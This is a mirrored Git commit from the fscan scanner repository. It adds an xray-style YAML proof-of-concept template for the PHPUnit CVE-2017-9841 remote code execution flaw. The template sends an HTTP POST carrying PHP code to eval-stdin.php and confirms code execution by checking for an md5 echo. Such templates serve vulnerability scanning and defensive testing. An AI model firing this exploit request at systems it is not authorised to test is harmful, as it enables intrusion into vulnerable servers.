mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 05:01:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,13 @@
|
||||
name: poc-yaml-phpunit-cve-2017-9841-rce
|
||||
set:
|
||||
rand: randomInt(2000000000, 2100000000)
|
||||
rules:
|
||||
- method: POST
|
||||
path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
|
||||
body: <?=print(md5({{rand}}));?>
|
||||
follow_redirects: false
|
||||
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
|
||||
detail:
|
||||
author: p0wd3r,buchixifan
|
||||
links:
|
||||
- https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841
|
||||
Reference in New Issue
Block a user